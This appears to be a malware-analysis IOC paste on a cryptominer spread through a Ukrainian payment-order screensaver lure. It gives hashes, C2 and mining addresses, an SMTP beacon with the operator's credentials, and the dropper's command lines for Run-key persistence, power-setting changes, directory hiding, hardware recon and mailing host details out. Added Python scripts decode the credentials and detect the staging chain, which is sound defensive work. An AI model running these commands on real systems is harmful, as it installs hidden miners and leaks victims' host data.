VRad
#coinminer_150319
Mar 20th, 2019

#IOC #OptiData #VR #coinminer #bmcon #SCR

https://pastebin.com/eTPuCkhC

previous contact:
https://pastebin.com/ELpZTc1y

attack_vector
--------------
email attach > SCR > C:\Intel\*

email_headers
--------------
n/a

files
--------------
SHA-256 fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, vd4,] (Ukrainian: "Payment order 1C No. 14343676173 - 2019")
File size 735.93 KB

SHA-256 5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows] (same Ukrainian lure name, .scr extension)
File size 793.76 KB

SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name bmcon.exe [Intel 80386, for MS Windows, UPX compressed]
File size 354.5 KB (363008 bytes)

SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
File name sender.exe [Intel 80386, for MS Windows]
File size 220 KB (225280 bytes)

SHA-256 b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
File name bm-xmrig.exe [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
File size 750.5 KB (768512 bytes)

activity
**************
SEND SMTP_587
--------------
220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
EHLO apm11
250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@account-identification.site>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Tue, 19 Mar 2019 14:39:17 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@account-identification.site
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
Subject: PC-APM11/User-support
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset="UTF-8"

OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
PU-...................... VGA ...................... ..............
.
250 OK id=1h6ccp-002kK0-KG
QUIT
221 vserver321.axc.nl closing connection
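
The AUTH PLAIN line in the session above carries the mailer account's credentials base64-encoded, not encrypted, and the client sends it straight after EHLO without STARTTLS even though the server advertises it, so the password is recoverable from the capture. The snippet below is an added example, not part of the original paste, that decodes the token per RFC 4616 and cross-checks it against the -u/-pw flags of the sender.exe command line listed under proc further down; the Blat-style flags and the X-Mailer header together indicate sender.exe is a Blat build. Both inputs are copied verbatim from this paste; the function names are the example's own.

```python
import base64
import shlex

# Client line captured in the SMTP session above (copied from this paste).
AUTH_PLAIN_LINE = "AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h"

# sender.exe command line from the proc section of this paste. The flags are
# Blat's (-to -f -server -port -u -pw -subject -body), matching the X-Mailer header.
SENDER_CMDLINE = (
    r'C:\Intel\sender.exe -to recipient@account-identification.site '
    r'-f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site '
    r'-port 587 -u sender@download-files.site -pw epsiloneridana '
    r'-subject "PC-APM11/User-support" '
    r'-body "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"'
)


def decode_auth_plain(line):
    """Decode an 'AUTH PLAIN <base64>' client line (RFC 4616).

    The payload is [authzid] NUL authcid NUL password. Base64 is an encoding,
    not encryption, so anyone holding the capture recovers the password.
    """
    token = line.split()[-1]
    raw = base64.b64decode(token, validate=True)
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        raise ValueError("payload is not authzid NUL authcid NUL password")
    return tuple(p.decode("utf-8") for p in parts)


def encode_auth_plain(authcid, password, authzid=""):
    """Inverse of decode_auth_plain; confirms a captured token against known credentials."""
    raw = b"\x00".join(s.encode("utf-8") for s in (authzid, authcid, password))
    return base64.b64encode(raw).decode("ascii")


def parse_flag_args(cmdline):
    """Map '-flag value' pairs of a Blat-style command line to a dict.

    Backslash escaping is switched off so Windows paths survive tokenisation;
    quoted values (the -f, -subject and -body arguments) stay single tokens.
    """
    lexer = shlex.shlex(cmdline, posix=True)
    lexer.whitespace_split = True
    lexer.escape = ""
    argv = list(lexer)
    args = {}
    i = 1  # argv[0] is the executable
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            args[tok[1:]] = argv[i + 1]
            i += 2
        elif tok.startswith("-"):
            args[tok[1:]] = True  # bare switch
            i += 1
        else:
            i += 1
    return args


def credentials_match(auth_line, cmdline):
    """True when the SMTP AUTH PLAIN credentials equal the mailer's -u/-pw arguments."""
    _authzid, authcid, password = decode_auth_plain(auth_line)
    args = parse_flag_args(cmdline)
    return (authcid, password) == (args.get("u"), args.get("pw"))


if __name__ == "__main__":
    print(decode_auth_plain(AUTH_PLAIN_LINE))
    print("matches sender.exe arguments:", credentials_match(AUTH_PLAIN_LINE, SENDER_CMDLINE))
```

The decoded authcid and password are the same account the operator hard-coded into the sender.exe invocation, which is how the beacon account can be reported to the mail provider even when only the pcap or only the process log is available.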

netwrk
--------------
http
93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.122 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.114 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/t... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.121 crl.microsoft.com GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1 Microsoft-CryptoAPI/6.1

ssl
88.99.38.225 dl.browsermine.com Client Hello

comp
--------------
bmcon.exe 3064 TCP localhost 49518 88.99.38.225 443 ESTABLISHED
bmcon.exe 3064 TCP localhost 49519 93.184.221.240 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49520 178.18.231.122 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49521 178.18.231.114 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49522 88.99.38.225 443 ESTABLISHED

bm-xmrig.exe 1776 TCP localhost 49524 159.69.189.115 4444 ESTABLISHED

svchost.exe 244 TCP localhost 49525 93.184.221.240 80 ESTABLISHED
svchost.exe 244 TCP localhost 49526 178.18.231.121 80 ESTABLISHED
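
Most of the http entries above are not campaign infrastructure. The Microsoft-CryptoAPI/6.1 user agent on ctldl.windowsupdate.com, the two OCSP responders and crl.microsoft.com is Windows validating certificate chains; the IdenTrust and Let's Encrypt OCSP lookups are consistent with the certificate presented by dl.browsermine.com. Those hosts are triggered by the malware but are not worth blocking. The connections that belong in a blocklist are bmcon.exe to 88.99.38.225:443 (dl.browsermine.com) and bm-xmrig.exe to 159.69.189.115:4444. The script below is an added example, not part of the original paste, that joins the comp, http and ssl lines copied from above and separates the two groups; the labels and the is_cert_infra heuristic are the example's own.

```python
from collections import namedtuple

Conn = namedtuple("Conn", "proc pid proto lport rip rport state")

# Constructed sample input: the http, ssl and comp lines of this paste, verbatim.
HTTP_LINES = [
    "93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/... HTTP/1.1 Microsoft-CryptoAPI/6.1",
    "178.18.231.122 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1",
    "178.18.231.114 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1",
    "178.18.231.121 crl.microsoft.com GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1 Microsoft-CryptoAPI/6.1",
]
SSL_LINES = ["88.99.38.225 dl.browsermine.com Client Hello"]
COMP_LINES = [
    "bmcon.exe 3064 TCP localhost 49518 88.99.38.225 443 ESTABLISHED",
    "bmcon.exe 3064 TCP localhost 49519 93.184.221.240 80 ESTABLISHED",
    "bmcon.exe 3064 TCP localhost 49520 178.18.231.122 80 ESTABLISHED",
    "bmcon.exe 3064 TCP localhost 49521 178.18.231.114 80 ESTABLISHED",
    "bmcon.exe 3064 TCP localhost 49522 88.99.38.225 443 ESTABLISHED",
    "bm-xmrig.exe 1776 TCP localhost 49524 159.69.189.115 4444 ESTABLISHED",
    "svchost.exe 244 TCP localhost 49525 93.184.221.240 80 ESTABLISHED",
    "svchost.exe 244 TCP localhost 49526 178.18.231.121 80 ESTABLISHED",
]


def parse_comp(line):
    """proc pid proto localhost lport rip rport state -> Conn."""
    p = line.split()
    return Conn(p[0], int(p[1]), p[2], int(p[4]), p[5], int(p[6]), p[7])


def index_hosts(http_lines, ssl_lines):
    """ip -> (hostname, user_agent or None), joining the http and ssl observations."""
    info = {}
    for line in http_lines:
        ip, host, _method, _path, _version, ua = line.split()
        info[ip] = (host, ua)
    for line in ssl_lines:
        ip, host, _rest = line.split(maxsplit=2)
        info.setdefault(ip, (host, None))
    return info


def is_cert_infra(host):
    """Heuristic (example's own): CTL, CRL and OCSP endpoints Windows hits while validating a chain."""
    labels = host.lower().split(".")
    return (host.lower() in {"ctldl.windowsupdate.com", "crl.microsoft.com"}
            or "ocsp" in labels or labels[0] in {"crl", "ocsp"})


def label(conn, info):
    host, ua = info.get(conn.rip, (None, None))
    if ua and ua.startswith("Microsoft-CryptoAPI") and host and is_cert_infra(host):
        return "cert_validation_noise"
    if conn.rport == 443:
        return "tls_c2_or_download"
    if conn.rport in (80, 8080):
        return "http_unclassified"
    return "nonstandard_port"  # the miner's 4444 in this case


def ioc_candidates(comp_lines, http_lines, ssl_lines):
    """Sorted (process, host-or-ip:port, label) for every connection that is not chain-validation noise."""
    info = index_hosts(http_lines, ssl_lines)
    out = set()
    for line in comp_lines:
        c = parse_comp(line)
        lab = label(c, info)
        if lab == "cert_validation_noise":
            continue
        host = info.get(c.rip, (None, None))[0]
        out.add((c.proc, f"{host or c.rip}:{c.rport}", lab))
    return sorted(out)


def noise_hosts(comp_lines, http_lines, ssl_lines):
    """Sorted hostnames that were contacted only as part of certificate validation."""
    info = index_hosts(http_lines, ssl_lines)
    return sorted({info[parse_comp(l).rip][0] for l in comp_lines
                   if label(parse_comp(l), info) == "cert_validation_noise"})


if __name__ == "__main__":
    for proc, indicator, lab in ioc_candidates(COMP_LINES, HTTP_LINES, SSL_LINES):
        print(f"{proc:14} {indicator:28} {lab}")
    print("noise:", ", ".join(noise_hosts(COMP_LINES, HTTP_LINES, SSL_LINES)))
```

Keep the noise list as context (it tells you the sample was TLS-validating its download server) but do not push it to a blocklist; blocking ctldl.windowsupdate.com or the OCSP responders breaks legitimate certificate validation on every host behind the same egress.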

proc
--------------
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
(value name is Russian for "Integrated_drivers")

C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -h off

C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel\bmcon

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
C:\Intel\sender.exe -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"
(the GPU field is the Russian-locale Windows name for "Standard VGA Graphics Adapter")

C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f

C:\Windows\SysWOW64\PING.EXE ping -n 300 127.0.0.1

C:\Intel\bmcon.exe
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
"C:\Intel\bmcon\bm-xmrig.exe"
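
The proc chain above is a typical miner-staging sequence. The .scr lure is run with /S (the switch Windows passes to a screensaver) and WINWORD.EXE starts right after it, consistent with a decoy document; a reg delete clears an older Run value; powercfg turns off hibernation, zeroes the AC standby and hibernate timeouts and, through the SUB_BUTTONS/LIDACTION GUIDs, sets the lid-close action to 0 (do nothing) so the host keeps mining; attrib marks C:\Intel system+hidden; cmd and WMIC collect OS version, CPU and GPU names for the SMTP beacon; reg add installs the new Run value; and ping -n 300 127.0.0.1 is a roughly five-minute sleep before bmcon.exe launches the xmrig build. The code below is an added example, not part of the original paste, that tags command lines of this shape with regex rules and flags the combination keep_awake + hide_path + run_key_add; the sample lines are copied from the proc section, while the rule names, patterns and thresholds are the example's own.

```python
import re

# Constructed sample input: command lines copied from the proc section of this paste.
SAMPLE_PROC_LINES = [
    r'"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S',
    r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde',
    r'C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "',
    r'C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f',
    r'C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0',
    r'C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0',
    r'C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0',
    r'C:\Windows\SysWOW64\powercfg.exe -h off',
    r'C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel',
    r'C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver',
    r'C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .',
    r'C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f',
    r'C:\Windows\SysWOW64\PING.EXE ping -n 300 127.0.0.1',
    r'"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"',
]

# powercfg setting GUIDs used on this host: power-button subgroup and lid-close action.
SUB_BUTTONS = "4f971e89-eebd-4455-a8de-9e59040e7347"
LIDACTION = "5ca83367-6e45-459f-a27b-476b1d01c936"

# Rule names and patterns are this example's own, not a published rule set.
RULES = [
    ("keep_awake", re.compile(r"powercfg(\.exe)?\s+[-/]h\s+off\b", re.I)),
    ("keep_awake", re.compile(r"powercfg(\.exe)?\s+[-/]change\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I)),
    ("keep_awake", re.compile(rf"powercfg(\.exe)?\s+[-/]setacvalueindex\s+\S+\s+{SUB_BUTTONS}\s+{LIDACTION}\s+0\b", re.I)),
    ("hide_path", re.compile(r"attrib(\.exe)?\b.*\+[sh]\s+\+[sh]\s+\S+", re.I)),
    ("run_key_add", re.compile(r'reg(\.exe)?\s+add\s+"?HK\w*\\.*\\CurrentVersion\\Run\b', re.I)),
    ("run_key_delete", re.compile(r'reg(\.exe)?\s+delete\s+"?HK\w*\\.*\\CurrentVersion\\Run\b', re.I)),
    ("hw_recon", re.compile(r"\bwmic\b.*\b(cpu\s+get|win32_processor|win32_videocontroller)\b", re.I)),
    ("os_recon", re.compile(r"cmd(\.exe)?\s+/c\s+ver\b", re.I)),
    ("scr_from_user_dir", re.compile(r'\\Users\\[^"]*\.scr"?\s+/s\b', re.I)),
]
PING_SLEEP = re.compile(r"ping(\.exe)?\b.*-n\s+(\d+)\s+(127\.0\.0\.1|localhost)\b", re.I)
PING_SLEEP_MIN = 30  # echo requests (~1 s apart); fewer is probably a real reachability check


def classify(cmdline):
    """Return the set of rule tags that fire on one process command line."""
    tags = {tag for tag, rx in RULES if rx.search(cmdline)}
    m = PING_SLEEP.search(cmdline)
    if m and int(m.group(2)) >= PING_SLEEP_MIN:
        tags.add("ping_sleep")
    return tags


def triage(lines):
    """tag -> list of command lines that triggered it."""
    by_tag = {}
    for line in lines:
        for tag in classify(line):
            by_tag.setdefault(tag, []).append(line)
    return by_tag


# Disabling sleep, hiding the drop directory and adding a Run key together form the
# staging pattern seen here; any one of them alone is ordinary admin activity.
MINER_PREP = {"keep_awake", "hide_path", "run_key_add"}


def is_miner_prep_chain(lines):
    return MINER_PREP <= set(triage(lines))


if __name__ == "__main__":
    for tag, hits in sorted(triage(SAMPLE_PROC_LINES).items()):
        print(f"{tag:18} {len(hits)}")
    print("miner staging chain:", is_miner_prep_chain(SAMPLE_PROC_LINES))
```

Run it over Sysmon event 1 or EDR process-creation command lines for a host; the individual tags are noisy on their own, which is why the verdict is keyed on the combination rather than on any single powercfg or attrib invocation.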

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.03.2019 14:39

#1 BMCon c:\intel\bmcon.exe 03.11.2018 2:42

#2 private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
c:\intel\private.exe 20.06.1992 0:22

drop
--------------
C:\Intel\GfxUI.exe.config
C:\Intel\IGFXDEVLib.dll
C:\Intel\iglhxa32.vp
C:\Intel\Impcd.cat
C:\Intel\IntcDAuC.dll
C:\Intel\mup.xml
C:\Intel\private.exe
C:\Intel\readme-VGA.txt
C:\Intel\sender.exe
C:\Intel\Setup2.if2

C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json
C:\Intel\bmcon\bm-xmrig-amd.exe
C:\Intel\bmcon\bm-xmrig-amd.json
C:\Intel\bmcon\bm-xmrig-nvidia.exe
C:\Intel\bmcon\bm-xmrig-nvidia.json
C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
C:\Intel\bmcon\bm-xmrig-x32.exe
C:\Intel\bmcon\nvrtc64_80.dll
C:\Intel\bmcon\nvrtc64_100_0.dll
C:\Intel\bmcon\nvrtc-builtins64_80.dll
C:\Intel\bmcon\nvrtc-builtins64_100.dll
C:\Intel\bmcon.exe
C:\Intel\bmcon.json

# # #
https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde

https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details

VR

@